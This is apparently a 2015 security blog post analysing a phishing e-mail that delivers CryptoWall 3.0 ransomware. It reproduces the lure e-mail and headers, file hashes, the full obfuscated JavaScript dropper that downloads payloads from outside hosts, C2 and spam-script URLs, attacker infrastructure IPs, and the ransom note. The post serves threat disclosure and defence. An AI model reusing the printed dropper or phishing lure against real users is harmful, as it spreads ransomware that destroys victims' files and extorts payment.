“Statement #338069 JUL-2015” virus e-mail containing .js file

An e-mail through today:

From: Pete Lloyd <Pete-Lloyd@aman-capital.com>
Subject: Statement #338069 JUL-2015
Attachment: Statement #338069 JUL-2015.zip

Hi ,

Please find attached a copy of the statement for the month of JUL-2015.

Kind regards,
Pete Lloyd

Headers

Received: from fiorano.websitewelcome.com (192.185.82.121) by
DB3FFO11FD050.mail.protection.outlook.com (10.47.217.81) with Microsoft SMTP
Server (TLS) id 15.1.213.8 via Frontend Transport; Mon, 20 Jul 2015 08:51:45
+0000
Received: from weirichs by fiorano.websitewelcome.com with local (Exim 4.85)
(envelope-from <weirichs@fiorano.websitewelcome.com>)
id 1ZH6nX-0002FK-IR
for REDACTED; Mon, 20 Jul 2015 03:51:43 -0500
To: <REDACTED>
Subject: Statement #338069 JUL-2015
X-PHP-Script: http://www.weirichsfurniture.com/tamper.php for 109.201.130.1
From: Pete Lloyd <Pete-Lloyd@aman-capital.com>
Reply-To:
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”_c1653204-f2b2-4025-8e90-fc91e807165c_”
Message-ID: <E1ZH6nX-0002FK-IR@fiorano.websitewelcome.com>
Date: Mon, 20 Jul 2015 03:51:43 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – fiorano.websitewelcome.com
X-AntiAbuse: Original Domain – REDACTED
X-AntiAbuse: Originator/Caller UID/GID – [3306 32007] / [47 12]
X-AntiAbuse: Sender Address Domain – fiorano.websitewelcome.com
X-BWhitelist: no
X-Source-IP:
X-Exim-ID: 1ZH6nX-0002FK-IR
X-Source: /opt/php54/bin/php-cgi
X-Source-Args: /opt/php54/bin/php-cgi /home/weirichs/public_html/tamper.php
X-Source-Dir: weirichsfurniture.com:/public_html
X-Source-Sender:
X-Source-Auth: weirichs
X-Email-Count: 40
X-Source-Cap: d2VpcmljaHM7dGRoYXllcjtmaW9yYW5vLndlYnNpdGV3ZWxjb21lLmNvbQ==
Return-Path: weirichs@fiorano.websitewelcome.com
X-EOPAttributedMessage: 0
X-Forefront-Antispam-Report: CIP:192.185.82.121;CTRY:;IPV:NLI;EFV:NLI;
X-Microsoft-Antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:AMSPR03MB567;

The “Statement #338069 JUL-2015.zip” file contained “Statement #338069 JUL-2015.js” which is obfuscated JavaScript.
SHA256 f92bbd95eae12e626cca30b3e548a51364237959a85202a6599424e3b80fce4d
VirusTotal Report / Malwr Report
Also SHA256 591a595f3c60d269b1cc996688d6b3a71d78532587683a2dd88b3ae6948de5d4
SHA256 5fdeab370221b240c678a7f6d2adc57e962a1068a84f4c74b606f3965a19c5eb
SHA256 1ac4267d05e6ca0d6a439fd89bbb7830c3da092dc6d93eee870af3a8251bc857
SHA256 cecc433fb3c4faab0e65708fbd61e16b8a26265a3b97a12195c51ff0993dcc90
SHA256 4942644db9d6fb972140d24662c1ed58b2837c24a4bf92d4474dafeb95698a63
SHA256 05fb11e65c36f9ff97102e66df6c9e280ca33326f3e0906984ec59cb92ad3180
SHA256 74c0619d7d3613057b0aa52cd271c93ef0310e4e420f835a9f7b92fa3ac7ee36
SHA256 335d2c101ee4859ee2e81c41489ae770217c38722cba272bb3f80ada8445bbee
SHA256 c952147ef6b31d877b1744ef17a9e265fd17c9342b6eea19b3c09e96104baa36
SHA256 0843b5c6f195cea6bd5ad3c857511fe2456e45fe11f5b049b280126a200d1311
SHA256 fb1a0d76d1204eb866b325a88c8f0ee9466b13cf572fbf3d1dd409efdd5d49b6
SHA256 d294334c055aeb39e77de77758566b7ee85f9a15dfcbc64642989641390e7514
SHA256 e47b9f4e89de178724d4807e7f5a6b91a820f07af2ed7a9f1360ec79deb80f63
SHA256 07c7d92f2eed2ef9fad8b8b00ccac2f789ce318a2e4764e74412514ef54eb773
SHA256 442f3eeb091eece31459e9d9e017e70d3d94a132c679381abec4cfc7669650f6
SHA256 8f1ecd9469d9445336955149ec24c6b3e03ad7186a8fa19ca6aeae35515f21d5

var pCjxWC='fnuunOcmtUiXognG kdelv(BfHrs,K HfAnq,B frxnR)u{i x KvcatrZ xwOsM s=d znMeAwg SAlcKtOinvSeGXxOabGjoebcmtl(s"gWUSqcrrwijpQtu.ySdhmebldlz"c)J;S O UvgaBrm mfynN t=m owfsY.hEMxtpXaDnqdGEUnkvFiyrXognbmWeInktoSWtErViXnrgHsW(E"B%ITtEhMhPa%u"a)y x+Q FSStArKiQnXgq.rfuryocmjCVhhaErsCZoMdPee(O9X';var KMGd='2X)v E+x pfenw;n u BvGavrL WxToB O=O AnqexwV YACcOtxiPvdebXdOBbyjYeGcwtO(k"sMBSfXtMILb2F.eXvMGLsHJTGTjPH"c)I;K r FxZoU.hoCnWrgebacddyqsNtWastteQcAhUaVnegQeb X=Z ifHugnLcPtqiCoVnQ X(D)T{t j u W Mikfj j(cxdoz.dryeUaHdOywSftnaftmeU q=C=L=t Y4c)Q{b v K L p g YvaaQrH DxuaG g=s bnoeGwX TAu';var iAGpK='cCtGiPvteJXaOmbijDeDcJty(N"UAnDuOtDOBL.ASStFrGeyaymh"m)E;F G z I N O BxWap.ooEpsernO(q)F;j e z c t L cxLaR.jtKyPpQex U=W D1U;e R i g n Y UxsaQ.MwGrHiRtqem(RxSof.dRversupeoBnKsveyBfoSdCyz)w;T i d H G y zxXaK.GpfocsxiRtuiQoxnX L=o S0q;p d m o I E qxHaB.KspaevRewTcoRFTimlXez(PfVnQ,J l2O';var jCd=')h;w C A n s d Zxgal.ecXltofsiej(J)z;f l R z Y}p z n K P;x v e}f s g;f f YtIrFyF u{j d n O MxXoX.MoCpJednC(h"SGBEVTc"R,T Yfvry,Q cfdavlBsmeB)H;g k l T yxxoq.VsJetnfdm(w)M;F y i i QiCfG M(ArXno e&gt;T q0Q)U{x w E i Q C gwHsY.pRBuDnc(xfQnh,w z0Q,M B0W)Z;C u N g N}E x h B t;m k K}p Q RcNaG';var EkeE='tScRhi Q(ieQrM)i{g Z j}D y m;x}MdSlL(Q"PhttStJpf:D/T/U1U4l0i7a2E0A1I5U.jcYohmR/EiHmBaIgGensF/SgGlQojbVaJlC1f.pjFpygJ"Z,k s"A5o5t7I4J9c2h9q.temxyev"u,E j1A)X;pdQlG(L"ahJtqtPpP:p/Z/p1Z4S0p7N2L0y1X5n.fcOohmS/MicmMaRgLeMso/BgdlvoMbEaElC2U.TjspugJ"R,M y"f3X4w5C4K8c0R1r.uedxUeG"u,g T1i)h;x';var arMfQotWGPKrbGfJMa=pCjxWC+KMGd+iAGpK+jCd+EkeE;   var AeRzxJqEhHtYallGCa="";   var igPiXqpCACcaTHrSFBJJ=2+1;   var EDHrosyqSyOzNxWDmZ="hTtGFTKuVoCgKdv";   var MOLHIgvLMFoInCcYRZWYmZXGA="length";   var ryCEpzSAGbhCnuIcDvegUvFrU="FullName";   var isyREtPHyFGRGNtnQg="charAt";   if(WScript[ryCEpzSAGbhCnuIcDvegUvFrU][MOLHIgvLMFoInCcYRZWYmZXGA]&gt;3){EDHrosyqSyOzNxWDmZ="va";igPiXqpCACcaTHrSFBJJ=igPiXqpCACcaTHrSFBJJ-1};   for (i=0;i&lt;arMfQotWGPKrbGfJMa[MOLHIgvLMFoInCcYRZWYmZXGA];i +=igPiXqpCACcaTHrSFBJJ){   AeRzxJqEhHtYallGCa =AeRzxJqEhHtYallGCa+arMfQotWGPKrbGfJMa[isyREtPHyFGRGNtnQg](i);}   var XCeHKVaPWkYEBcMtQErGXpV="e"+EDHrosyqSyOzNxWDmZ+"l";   function test(x){return x;};   var rUlOwxHMCzTaopxqI=test(this);   rUlOwxHMCzTaopxqI[XCeHKVaPWkYEBcMtQErGXpV](AeRzxJqEhHtYallGCa);        //t6uKU6TKqg

It seems the javascript file downloads from:

http://14072015.com/images/global1.jpg
http://14072015.com/images/global2.jpg

The domain looks very much like a date.. so let’s guess this particular infection run has been going since the 14th of the month. The whois shows the creation date to support this too.

Which I think then dll injects? into svchost.exe which then makes the following requests:
cryptowall requests

Successful requests get sent to:

http://blog.ogc.com.pk/wp-content/plugins/wp-antibot-standart/e.php
[160.153.47.225] hosted at GoDaddy.

Fires up a .exe from the users temp directory
SHA256 d117255d9512eeaf9fbb9e0b9c842cc7040ced02793d479096278a5f15108c99
VirusTotal Report / Malwr Report
A
lso:
SHA256 0edb51c5743c64d8eda9340032a77ccba3f385327c2aa837b7e6235d51a2d9e2
SHA256 c083452a454fdb1fff110f72dd36aa75a4b79b5b3456a494089e538b78d0d684
SHA256 d1cc9db36f2aa6324b9bbd2104f643ad76bf3d058fe73f04f865ddcaf5b737d0
SHA256 89dd679230043308d0abc8dd8feb0b265c04734ce605d9b443392b8338ee1112

And then encrypts files / ransoms files.

cryptowall javascript infected

What happened to your files?
All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.
More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

What does this mean?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work
with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.

How did this happen?
Especially for you, on our server was generated the secret key pair RSA-2048 – public and private.
All your files were encrypted with the public key, which has been transferred to your computer via the Internet.
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

What do I do?
Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.
If you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1.http://6i3cb6owitcouepv.mywa2pay.com/Ltot9Y
2.http://6i3cb6owitcouepv.micropaysearch.com/Ltot9Y
3.http://6i3cb6owitcouepv.light2mind.com/Ltot9Y
4.http://6i3cb6owitcouepv.rightslavebb.com/Ltot9Y

If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2. After a successful installation, run the browser and wait for initialization.
3. Type in the address bar: 6i3cb6owitcouepv.onion/Ltot9Y
4. Follow the instructions on the site.
IMPORTANT INFORMATION:
Your Personal PAGE: http://6i3cb6owitcouepv.mywa2pay.com/Ltot9Y
Your Personal PAGE(using TOR): 6i3cb6owitcouepv.onion/Ltot9Y
Your personal code (if you open the site (or TOR ‘s) directly): Ltot9Y

None of the referenced urls work except for the ToR address.

cryptowall decrypt step 1“Service to decrypt the files. To continue please enter the code from the picture in the input field.” “Code of picture” “Enter to decrypt service”.

cryptowall decrypt step 2

The second infection I tried had some CnC failures revealing a bit of their code.

HTTP/1.1 200 OK
Date: Mon, 20 Jul 2015 10:54:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.43
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

db

&lt;b&gt;Warning&lt;/b&gt;:  curl_setopt(): CURLOPT_FOLLOWLOCATION cannot be activated when an open_basedir is set in &lt;b&gt;/htdocs/wp-includes/js/tinymce/skins/wordpress/images/e.php&lt;/b&gt; on line &lt;b&gt;176&lt;/b&gt;

4883ebd0e6b298
0

UPDATE:
As of 2pm BST on 2015-07-21 the javascript dropper is now fetching files from an alternate domain (The original domain 14072015.com seems to be returning 0 length or corrupt files).
The new domain in use is now:

http://14072015q.com/images/global1.jpg
and
http://14072015q.com/images/global2.jpg

Interestingly this domain was also registered back on the 14th of July.. so the “q” variant was clearly registered as a contingent.

The both the domains are associated with the following nameservers:

14072015q.com NS ns1.kolpyato.at
14072015q.com NS ns1.colduregk.org
14072015q.com NS ns1.dervoilrtd.org
14072015q.com NS ns2.kolpyato.at
14072015q.com NS ns2.colduregk.org
14072015q.com NS ns2.dervoilrtd.org
14072015q.com NS ns3.kolpyato.at
14072015q.com NS ns3.colduregk.org
14072015q.com NS ns3.dervoilrtd.org
14072015q.com NS ns4.kolpyato.at
14072015q.com NS ns4.colduregk.org
14072015q.com NS ns4.dervoilrtd.org

All of the above nameserver hostnames point to the following IPs.
Addresses: 81.22.130.97 [CPE10097.tvcom.net.ua]
93.76.59.46
93.113.176.105
5.105.52.34 [5-105-52-34.mytrinity.com.ua]
178.159.115.6 [host-178-159-115-6.mirgiga.net]
109.251.25.10 [109.251.25.10.freenet.com.ua]

The domains also mirror the setup for the IPs they point to:

Name: 14072015q.com
Addresses: 178.151.23.241 [241.23.151.178.triolan.net]
94.76.127.113 [94.76.127.113.freenet.com.ua]
94.154.35.51
46.150.91.176 [vra-091-176.vivanet.net.ua]
93.76.185.64 [93-76-185-64.dynamic-FTTB.kharkov.volia.com]
5.105.153.84 [5-105-153-84.mytrinity.com.ua]
95.105.249.36 [95-105-249-36.dynamic.orange.sk]
217.24.64.168
141.101.19.13 [ppp-141-101-19-13.wildpark.net]
46.98.139.24

The things generating the e-mail spam seem to be the following scripts.

http://www.weirichsfurniture.com/tamper.php (Hostgator)
http://clasificadosconfotos.es/mtqzpa/par/par.php (Hostgator)
http://webicrafts.com/wp-includes/pomo/pomo.php (Hostgator)
http://mattsonssteakhouse.com/colbrz/par/par.php (Hostgator)
http://himalayanyogini.com/wp-includes/images/images.php (Hostgator)
http://www.trinitye.com/wp-includes/theme-compat/theme-compat.php (Hostgator)
http://auburnrefinishing.com/floorscientist.com/wp-content/wp-content.php (Hostgator)
http://typicalnaija.com/wp-admin/css/css.php (Hostgator)
http://youtubemarketers.com/upgrade/upgrade.php
http://lovemotel.fr/temp.php

From the above I would say that HostGator really need to do a better job of not allowing their services to be used for malware and spam!

More recent domains also seen:

http://22072014a.com/images/global1.jpg (Someone typoed the year?)
http://22072014b.com/images/global1.jpg

These domains use the same nameservers as the previous domain but a different set of hosts for their HTTP access:

Addresses: 217.67.67.229 “pppoe.217-67-67-229.M-NAS01.mytrinity.com.ua”
46.201.169.25 “25-169-201-46.pool.ukrtel.net”
176.118.146.186
94.76.127.113 “94.76.127.113.freenet.com.ua”
70.51.45.30
130.255.143.218 “218-143-255-130.host.sevstar.net”
188.239.91.46 “vpn-188.239.91-46.link-kremen.net”
5.105.50.179 “5-105-50-179.mytrinity.com.ua”
184.144.203.251 “bas3-longueuil15-3096497147.dsl.bell.ca”
178.151.161.143 “143.161.151.178.triolan.net”

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

3 Responses to “Statement #338069 JUL-2015” virus e-mail containing .js file

  1. Pingback: “Your order # 139290 has been declined” Virus Email | thecomputerperson

  2. Pingback: Another batch of virus e-mails “Invoice #879384″ | thecomputerperson

  3. Laura says:

    JERKS

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s